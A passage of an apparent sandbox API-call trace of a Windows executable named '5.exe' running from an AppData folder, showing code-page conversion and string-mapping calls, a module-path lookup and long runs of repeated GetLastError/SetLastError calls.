dwFlags=0x1, lpMultiByteStr=0x18f1ec, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0137.835] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f1ec, cbMultiByte=256, lpWideCharStr=0x18eb58, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ檬FĀ") returned 256 [0137.835] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ檬FĀ", cchSrc=256, lpCharType=0x18edec | out: lpCharType=0x18edec) returned 1 [0137.835] GetLastError () returned 0x0 [0137.835] SetLastError (dwErrCode=0x0) [0137.835] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f1ec, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0137.835] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f1ec, cbMultiByte=256, lpWideCharStr=0x18eb28, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0137.835] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0137.835] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18e918, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0137.835] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x18f0ec, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ-UgÅ$ó\x18", lpUsedDefaultChar=0x0) returned 256 [0137.835] GetLastError () returned 0x0 [0137.835] SetLastError (dwErrCode=0x0) [0137.836] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f1ec, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0137.836] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f1ec, cbMultiByte=256, lpWideCharStr=0x18eb48, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0137.836] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0137.836] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18e938, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0137.836] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x18efec, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ-UgÅ$ó\x18", lpUsedDefaultChar=0x0) returned 256 [0137.836] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x48adf8, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\5.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\5.exe")) returned 0x56 [0137.836] GetLastError () returned 0x0 [0137.836] SetLastError (dwErrCode=0x0) [0137.836] GetLastError () returned 0x0 [0137.836] SetLastError (dwErrCode=0x0) [0137.836] GetLastError () returned 0x0 [0137.836] SetLastError (dwErrCode=0x0) [0137.836] GetLastError () returned 0x0 [0137.836] SetLastError (dwErrCode=0x0) [0137.836] GetLastError () returned 0x0 [0137.836] SetLastError (dwErrCode=0x0) [0137.836] GetLastError () returned 0x0 [0137.837] SetLastError (dwErrCode=0x0) [0137.837] GetLastError () returned 0x0 [0137.837] SetLastError (dwErrCode=0x0) [0137.837] GetLastError () returned 0x0 [0137.837] SetLastError (dwErrCode=0x0) [0137.837] GetLastError () returned 0x0 [0137.837] SetLastError (dwErrCode=0x0) [0137.837] GetLastError () returned 0x0 [0137.837] SetLastError (dwErrCode=0x0) [0137.837] GetLastError () returned 0x0 [0137.837] SetLastError (dwErrCode=0x0) [0137.837] GetLastError () returned 0x0 [0137.837] SetLastError (dwErrCode=0x0) [0137.837] GetLastError () returned 0x0 [0137.837] SetLastError (dwErrCode=0x0) [0137.837] GetLastError () returned 0x0 [0137.837] SetLastError (dwErrCode=0x0) [0137.837] GetLastError () returned 0x0 [0137.837] SetLastError (dwErrCode=0x0) [0137.837] GetLastError () returned 0x0 [0137.838] SetLastError (dwErrCode=0x0) [0137.838] GetLastError () returned 0x0 [0137.838] SetLastError (dwErrCode=0x0) [0137.838] GetLastError () returned 0x0 [0137.838] SetLastError (dwErrCode=0x0) [0137.838] GetLastError () returned 0x0 [0137.838] SetLastError (dwErrCode=0x0) [0137.838] GetLastError () returned 0x0 [0137.838] SetLastError (dwErrCode=0x0) [0137.838] GetLastError () returned 0x0 [0137.838] SetLastError (dwErrCode=0x0) [0137.838] GetLastError () returned 0x0 [0137.838] SetLastError (dwErrCode=0x0) [0137.838] GetLastError () returned 0x0 [0137.838] SetLastError (dwErrCode=0x0) [0137.838] GetLastError () returned 0x0 [0137.838] SetLastError (dwErrCode=0x0) [0137.838] GetLastError () returned 0x0 [0137.838] SetLastError (dwErrCode=0x0) [0137.838] GetLastError () returned 0x0 [0137.838] SetLastError (dwErrCode=0x0) [0137.839] GetLastError () returned 0x0 [0137.839] SetLastError (dwErrCode=0x0) [0137.839] GetLastError () returned 0x0 [0137.839] SetLastError (dwErrCode=0x0) [0137.839] GetLastError () returned 0x0 [0137.839] SetLastError (dwErrCode=0x0) [0137.839] GetLastError () returned 0x0 [0137.839] SetLastError (dwErrCode=0x0) [0137.839] GetLastError () returned 0x0 [0137.839] SetLastError (dwErrCode=0x0) [0137.839] GetLastError () returned 0x0 [0137.839] SetLastError (dwErrCode=0x0) [0137.839] GetLastError () returned 0x0 [0137.839] SetLastError (dwErrCode=0x0) [0137.839] GetLastError () returned 0x0 [0137.839] SetLastError (dwErrCode=0x0) [0137.839] GetLastError () returned 0x0 [0137.839] SetLastError (dwErrCode=0x0) [0137.839] GetLastError () returned 0x0 [0137.839] SetLastError (dwErrCode=0x0) [0137.839] GetLastError () returned 0x0 [0137.840] SetLastError (dwErrCode=0x0) [0137.840] GetLastError () returned 0x0 [0137.840] SetLastError (dwErrCode=0x0) [0137.840] GetLastError () returned 0x0 [0137.840] SetLastError (dwErrCode=0x0) [0137.840] GetLastError () returned 0x0 [0137.840] SetLastError (dwErrCode=0x0) [0137.840] GetLastError () returned 0x0 [0137.840] SetLastError (dwErrCode=0x0) [0137.840] GetLastError () returned 0x0 [0137.840] SetLastError (dwErrCode=0x0) [0137.840] GetLastError () returned 0x0 [0137.840] SetLastError (dwErrCode=0x0) [0137.840] GetLastError () returned 0x0 [0137.840] SetLastError (dwErrCode=0x0) [0137.840] GetLastError () returned 0x0 [0137.840] SetLastError (dwErrCode=0x0) [0137.840] GetLastError () returned 0x0 [0137.841] SetLastError (dwErrCode=0x0) [0137.841] GetLastError () returned 0x0 [0137.841] SetLastError (dwErrCode=0x0) [0137.841] GetLastError () returned 0x0 [0137.841] SetLastError (dwErrCode=0x0) [0137.841] GetLastError () returned 0x0 [0137.841] SetLastError (dwErrCode=0x0) [0137.841] GetLastError () returned 0x0 [0137.841] SetLastError (dwErrCode=0x0) [0137.841] GetLastError () returned 0x0 [0137.841] SetLastError (dwErrCode=0x0) [0137.841] GetLastError () returned 0x0 [0137.841] SetLastError (dwErrCode=0x0) [0137.841] GetLastError () returned 0x0 [0137.841] SetLastError (dwErrCode=0x0) [0137.841] GetLastError () returned 0x0 [0137.841] SetLastError (dwErrCode=0x0) [0137.841] GetLastError () returned 0x0 [0137.841] SetLastError (dwErrCode=0x0) [0137.841] GetLastError () returned 0x0 [0137.841] SetLastError (dwErrCode=0x0) [0137.841] GetLastError () returned 0x0 [0137.842] SetLastError (dwErrCode=0x0) [0137.842] GetLastError () returned 0x0 [0137.842] SetLastError (dwErrCode=0x0) [0137.842] GetLastError () returned 0x0 [0137.842] SetLastError (dwErrCode=0x0) [0137.842] GetLastError () returned 0x0 [0137.842] SetLastError (dwErrCode=0x0) [0137.842] GetLastError () returned 0x0 [0137.842] SetLastError (dwErrCode=0x0) [0137.842] GetLastError () returned 0x0 [0137.842] SetLastError (dwErrCode=0x0) [0137.842] GetLastError () returned 0x0 [0137.842] SetLastError (dwErrCode=0x0) [0137.842] GetLastError () returned 0x0 [0137.842] SetLastError (dwErrCode=0x0) [0137.842] GetLastError () returned 0x0 [0137.842] SetLastError (dwErrCode=0x0) [0137.842] GetLastError () returned 0x0 [0137.842] SetLastError (dwErrCode=0x0) [0137.842] GetLastError () returned 0x0 [0137.842] SetLastError (dwErrCode=0x0) [0137.842] GetLastError () returned 0x0 [0137.843] SetLastError (dwErrCode=0x0) [0137.843] GetLastError () returned 0x0 [0137.843] SetLastError (dwErrCode=0x0) [0137.843] GetLastError () returned 0x0 [0137.843] SetLastError (dwErrCode=0x0) [0137.843] GetLastError () returned 0x0 [0137.843] SetLastError (dwErrCode=0x0) [0137.843] GetLastError () returned 0x0 [0137.843] SetLastError (dwErrCode=0x0) [0137.843] GetLastError () returned 0x0 [0137.843] SetLastError (dwErrCode=0x0) [0137.843] GetLastError () returned 0x0 [0137.843] SetLastError (dwErrCode=0x0) [0137.843] GetLastError () returned 0x0 [0137.843] SetLastError (dwErrCode=0x0) [0137.843] GetLastError () returned 0x0 [0137.843] SetLastError (dwErrCode=0x0) [0137.843] GetLastError () returned 0x0 [0137.843] SetLastError (dwErrCode=0x0) [0137.843] GetLastError () returned 0x0 [0137.844] SetLastError (dwErrCode=0x0) [0137.844] GetLastError () returned 0x0 [0137.844] SetLastError (dwErrCode=0x0) [0137.844] GetLastError () returned 0x0 [0137.844] SetLastError (dwErrCode=0x0) [0137.844] GetLastError () returned 0x0 [0137.844] SetLastError (dwErrCode=0x0) [0137.844] GetLastError () returned 0x0 [0137.844] SetLastError (dwErrCode=0x0) [0137.844] GetLastError () returned 0x0 [0137.844] SetLastError (dwErrCode=0x0) [0137.844] GetLastError () returned 0x0 [0137.844] SetLastError (dwErrCode=0x0) [0137.844] GetLastError () returned 0x0 [0137.844] SetLastError (dwErrCode=0x0) [0137.844] GetLastError () returned 0x0 [0137.844] SetLastError (dwErrCode=0x0) [0137.844] GetLastError () returned 0x0 [0137.844] SetLastError (dwErrCode=0x0) [0137.844] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x0, Size=0x5f) returned 0x2f1990 [0137.844] GetLastError () returned 0x0 [0137.845] SetLastError (dwErrCode=0x0) [0137.845] GetLastError () returned 0x0 [0137.845] SetLastError (dwErrCode=0x0) [0137.845] GetLastError () returned 0x0 [0137.845] SetLastError (dwErrCode=0x0) [0137.845] GetLastError () returned 0x0 [0137.845] SetLastError (dwErrCode=0x0) [0137.845] GetLastError () returned 0x0 [0137.845] SetLastError (dwErrCode=0x0) [0137.845] GetLastError () returned 0x0 [0137.845] SetLastError (dwErrCode=0x0) [0137.845] GetLastError () returned 0x0 [0137.845] SetLastError (dwErrCode=0x0) [0137.845] GetLastError () returned 0x0 [0137.845] SetLastError (dwErrCode=0x0) [0137.845] GetLastError () returned 0x0 [0137.845] SetLastError (dwErrCode=0x0) [0137.845] GetLastError () returned 0x0 [0137.845] SetLastError (dwErrCode=0x0) [0137.846] GetLastError () returned 0x0 [0137.846] SetLastError (dwErrCode=0x0) [0137.846] GetLastError () returned 0x0 [0137.846] SetLastError (dwErrCode=0x0) [0137.846] GetLastError () returned 0x0 [0137.846] SetLastError (dwErrCode=0x0) [0137.846] GetLastError () returned 0x0 [0137.846] SetLastError (dwErrCode=0x0) [0137.846] GetLastError () returned 0x0 [0137.846] SetLastError (dwErrCode=0x0) [0137.846] GetLastError () returned 0x0 [0137.846] SetLastError (dwErrCode=0x0) [0137.846] GetLastError () returned 0x0 [0137.846] SetLastError (dwErrCode=0x0) [0137.846] GetLastError () returned 0x0 [0137.846] SetLastError (dwErrCode=0x0) [0137.846] GetLastError () returned 0x0 [0137.846] SetLastError (dwErrCode=0x0) [0137.846] GetLastError () returned 0x0 [0137.847] SetLastError (dwErrCode=0x0) [0137.847] GetLastError () returned 0x0 [0137.847] SetLastError (dwErrCode=0x0) [0137.847] GetLastError () returned 0x0 [0137.847] SetLastError (dwErrCode=0x0) [0137.847] GetLastError () returned 0x0 [0137.847] SetLastError (dwErrCode=0x0) [0137.847] GetLastError () returned 0x0 [0137.847] SetLastError (dwErrCode=0x0) [0137.847] GetLastError () returned 0x0 [0137.847] SetLastError (dwErrCode=0x0) [0137.847] GetLastError () returned 0x0 [0137.847] SetLastError (dwErrCode=0x0) [0137.847] GetLastError () returned 0x0 [0137.847] SetLastError (dwErrCode=0x0) [0137.847] GetLastError () returned 0x0 [0137.847] SetLastError (dwErrCode=0x0) [0137.848] GetLastError () returned 0x0 [0137.848] SetLastError (dwErrCode=0x0) [0137.848] GetLastError () returned 0x0 [0137.848] SetLastError (dwErrCode=0x0) [0137.848] GetLastError () returned 0x0 [0137.848] SetLastError (dwErrCode=0x0) [0137.848] GetLastError () returned 0x0 [0137.848] SetLastError (dwErrCode=0x0) [0137.848] GetLastError () returned 0x0 [0137.848] SetLastError (dwErrCode=0x0) [0137.848] GetLastError () returned 0x0 [0137.848] SetLastError (dwErrCode=0x0) [0137.848] GetLastError () returned 0x0 [0137.848] SetLastError (dwErrCode=0x0) [0137.848] GetLastError () returned 0x0 [0137.848] SetLastError (dwErrCode=0x0) [0137.848] GetLastError () returned 0x0 [0137.848] SetLastError (dwErrCode=0x0) [0137.849] GetLastError () returned 0x0 [0137.849] SetLastError (dwErrCode=0x0) [0137.849] GetLastError () returned 0x0 [0137.849] SetLastError (dwErrCode=0x0) [0137.849] GetLastError () returned 0x0 [0137.849] SetLastError (dwErrCode=0x0) [0137.849] GetLastError () returned 0x0 [0137.849] SetLastError (dwErrCode=0x0) [0137.849] GetLastError () returned 0x0 [0137.849] SetLastError (dwErrCode=0x0) [0137.849] GetLastError () returned 0x0 [0137.849] SetLastError (dwErrCode=0x0) [0137.849] GetLastError () returned 0x0 [0137.849] SetLastError (dwErrCode=0x0) [0137.849] GetLastError () returned 0x0 [0137.849] SetLastError (dwErrCode=0x0) [0137.849] GetLastError () returned 0x0 [0137.850] SetLastError (dwErrCode=0x0) [0137.850] GetLastError () returned 0x0 [0137.850] SetLastError (dwErrCode=0x0) [0137.850] GetLastError () returned 0x0 [0137.850] SetLastError (dwErrCode=0x0) [0137.850] GetLastError () returned 0x0 [0137.850] SetLastError (dwErrCode=0x0) [0137.850] GetLastError () returned 0x0 [0137.850] SetLastError (dwErrCode=0x0) [0137.850] GetLastError () returned 0x0 [0137.850] SetLastError (dwErrCode=0x0) [0137.850] GetLastError () returned 0x0 [0137.850] SetLastError (dwErrCode=0x0) [0137.850] GetLastError () returned 0x0 [0137.850] SetLastError (dwErrCode=0x0) [0137.850] GetLastError () returned 0x0 [0137.850] SetLastError (dwErrCode=0x0) [0137.850] GetLastError () returned 0x0 [0137.850] SetLastError (dwErrCode=0x0) [0137.850] GetLastError () returned 0x0 [0137.850] SetLastError (dwErrCode=0x0) [0137.850] GetLastError () returned 0x0 [0137.851] SetLastError (dwErrCode=0x0) [0137.851] GetLastError () returned 0x0 [0137.851] SetLastError (dwErrCode=0x0) [0137.851] GetLastError () returned 0x0 [0137.851] SetLastError (dwErrCode=0x0) [0137.851] GetLastError () returned 0x0 [0137.851] SetLastError (dwErrCode=0x0) [0137.851] GetLastError () returned 0x0 [0137.851] SetLastError (dwErrCode=0x0) [0137.851] GetLastError () returned 0x0 [0137.851] SetLastError (dwErrCode=0x0) [0137.851] GetLastError () returned 0x0 [0137.851] SetLastError 